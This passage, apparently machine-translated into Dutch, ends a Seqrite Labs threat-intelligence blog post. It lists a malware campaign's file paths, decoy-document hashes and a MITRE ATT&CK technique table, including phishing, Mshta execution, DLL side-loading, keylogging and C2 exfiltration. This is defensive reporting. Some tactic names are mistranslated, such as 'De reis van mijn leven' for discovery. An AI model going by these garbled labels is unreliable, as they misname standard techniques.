C:\ProgramData\LavaSoft\svnides.hta
C:\Users\Public\USOSshared-1de48789-1285\zuidrt.pdf
C:\Gebruikers\Openbaar\Downloads\Document.pdf
C:\Gebruikers\Openbaar\Downloads\suport.exe
E:\finalRnd\Mijnapp\obj\Debug\Mijnapp.pdb

decoys

320bc4426f4f152d009b6379b5257c78 2024-Nationale-Feestdagen-RH-PER_N-1.pdf
9de50f9357187b623b06fc051e3cac4f Beveiligingsrichtlijnen.pdf
c9c98cf1624ec4717916414922f196be NDC65-Bijgewerkt-Schema.pdf
83ce6ee6ad09a466eb96f347a8b0dc20 Document.pdf

MITRE ATT & CK

TTP Naam
Erkenning  
T1589.002 Identiteitsgegevens van slachtoffers verzamelen: e-mailadressen
Ontwikkeling van hulpbronnen  
T1583.001

T1584.001

T1587.001

T1588.001

T1588.002

T1608.001

T1608.005

T1585.002

T1586.002

Infrastructuur verwerven: domeinen

Compromisinfrastructuur: domeinen

Ontwikkelmogelijkheden: Malware

Mogelijkheden verkrijgen: Malware

Mogelijkheden verkrijgen: Tool

Stagemogelijkheden: Malware uploaden

Fasemogelijkheden: Link Target

Accounts aanmaken: e-mailaccounts

Compromisaccounts: e-mailaccounts

Eerste toegang
T1566.002 Phishing: Spear phishing-link
Uitvoering
T1106

T1129

T1059

T1047

T1204.001

T1204.002

Native API

Gedeelde modules

Commando- en scriptinterpreter

Windows Management Instrumentation

Uitvoering door gebruiker: kwaadaardige link

Uitvoering door gebruiker: kwaadaardig bestand

Volharding
T1053.003

T1547.001

Geplande taak/job: Cron

Register Run-sleutels / Opstartmap

Privilege-escalatie
T1548.002 Mechanisme voor misbruik van hoogtecontrole: gebruikersaccountbeheer omzeilen
verdediging ontduiking
T1036.005

T1036.007

T1140

T1218.005

T1574.002

T1027

T1620

Maskerade: match legitieme naam of locatie

Maskering: dubbele bestandsextensie

Deobfuscate/decodeer bestanden of informatie

Systeem binaire proxy-uitvoering: Mshta

Uitvoeringsstroom kapen: DLL side-loading

Verduisterde bestanden of informatie

Reflecterende code laden

De reis van mijn leven
T1012

T1016

T1033

T1057

T1082

T1083

T1518.001

Query register

Detectie van systeemnetwerkconfiguratie

Systeemeigenaar/gebruiker detectie

Procesopsporing

Ontdekking van systeeminformatie

Bestands- en directorydetectie

Softwaredetectie: detectie van beveiligingssoftware

Collectie
T1005

T1056.001

T1123

T1113

T1560.001

Gegevens van lokaal systeem

Invoer vastleggen: Keylogging

Audio Capture

Screen Capture

Verzamelde gegevens archiveren: archiveren via hulpprogramma

Command and Control
T1105

T1571

Ingress-tooloverdracht

Niet-standaard poort

exfiltratie
T1041 Exfiltratie via C2-kanaal

 

Auteurs:

Sathwik Ram Prakki

Kartikkumar Jivani

 Vorig berichtHet belang van de DPDP-wet voor de BFSI-sector
Volgend bericht  EDR vs XDR: de verschillen en de juiste keuze
Sathwik Ram Prakki

Over Sathwik Ram Prakki

Sathwik Ram Prakki werkt als beveiligingsonderzoeker bij Security Labs van Quick Heal. Zijn aandachtsgebieden zijn: Threat Intelonderzoek, het opsporen van bedreigingen en het schrijven over...

Artikelen van Sathwik Ram Prakki »

gerelateerde berichten

  • SVC Nieuwe Stealer aan de Horizon

    21 maart 2025
  • QR-code phishing (quishing)-aanvallen: hoe u ze kunt herkennen en voorkomen

    18 maart 2025
  • De GrassCall-campagne ontmaskerd: de hackers achter cyberfraude bij werving en selectie

    6 maart 2025
Aanbevolen auteurs
  • Seqrite
    Seqrite

    Seqrite is een toonaangevende leverancier van cybersecurityoplossingen voor bedrijven. Met een focus op...

    Lees meer artikelen van Seqrite
  • Bineesh P
    Bineesh P

    Ik ben een gepassioneerd cybersecurity-liefhebber en een toegewijd schrijver. Met een talent...

    Lees meer artikelen van Bineesh P.
  • Jyoti Karlekar
    Jyoti Karlekar

    Ik ben een fervent schrijver die graag content schrijft over opkomende technologieën en...

    Lees meer artikelen van Jyoti Karlekar
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar is de gezamenlijke algemeen directeur van Quick Heal Technologies...

    Lees meer artikelen van Sanjay Katkar
onderwerpen
geneigd (25) Cyber ​​aanval (36) cyberaanvallen (58) Cyber ​​aanval (16) cyberaanvallen (15) Cybersecurity (342) internetveiligheid (34) Cyberdreiging (33) cyber bedreigingen (51) datalek (56) datalekken (29) Data Loss (28) Data verlies voorkomen (34) data privacy (17) gegevensbescherming (35) gegevensbeveiliging (19) DLP (50) DPDP (14) DPDPA (17) Encryptie (16) eindpuntbeveiliging (113) Enterprise-beveiliging (20) Exploiteren (13) GDPR (14) malware (76) malware-analyse (14) malware-aanval (23) MDM (27) Microsoft (15) MITRE ATT & CK (14) Netwerk veiligheid (26) Phishing (30) Ransomware (69) ransomware-aanval (31) ransomware-aanvallen (31) ransomware-bescherming (17) Seqrite (41) Seqrite Encryptie (27) Seqrite EPS (33) Seqrite Services (16) bedreigingsdetectie (14) Threat Intelligentie (23) UTM (34) Kwetsbaarheid (16) nul vertrouwen (13)
Seqrite <font dir="auto" style="vertical-align: inherit;">Labs</font>

Toonaangevende leverancier van IT-beveiligingsoplossingen voor ondernemingen, die de beveiliging van eindpunten, gegevens en netwerken vereenvoudigt met toonaangevende oplossingen voor het voorkomen, detecteren en aanpakken van bedreigingen wereldwijd.

Lees meer over Seqrite

Volg ons:

Ontvang onze nieuwsbrief

Blijf op de hoogte van de laatste trends en inzichten op het gebied van cyberbeveiliging.

het laden
Producten en services
  • Cloud
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • Op Prem
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Platform
  • Malware Analysis Platform
  • Microbedrijf
  • SOHO Total Edition
  • Services
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Cyberbeveiliging & Data Privacy Bewustzijn
Informatiebronnen
  • Blogs
  • Whitepapers
  • Datasheets
  • Bedreigingsrapporten
  • Handleidingen
  • PoV
  • Begrip Data Privacy
  • DPDP-dialogen
  • Beleid en naleving
  • EULA
  • GoDeep.AI
  • SIA
  • Privacy-uur
Contact
  • Geregistreerde kantoren
  • Laten we het over cyberbeveiliging hebben
Support
  • Technische ondersteuning
  • Software downloaden
  • Offline-updater
  • firmware Upgrades
  • Upgrades
  • productdocumentatie
Over Ons
  • Over ons Seqrite
  • Leiderschap
  • Onderscheidingen en erkenning
  • Newsroom
Partners
  • Partner Program
  • Partner zoeken
  • Word een Partner
  • Seqrite Certificering

© 2026 Quick Heal Technologies Ltd.

Sitemap privacybeleid Wettelijke vermeldingen Cookiebeleid Gebruiksvoorwaarden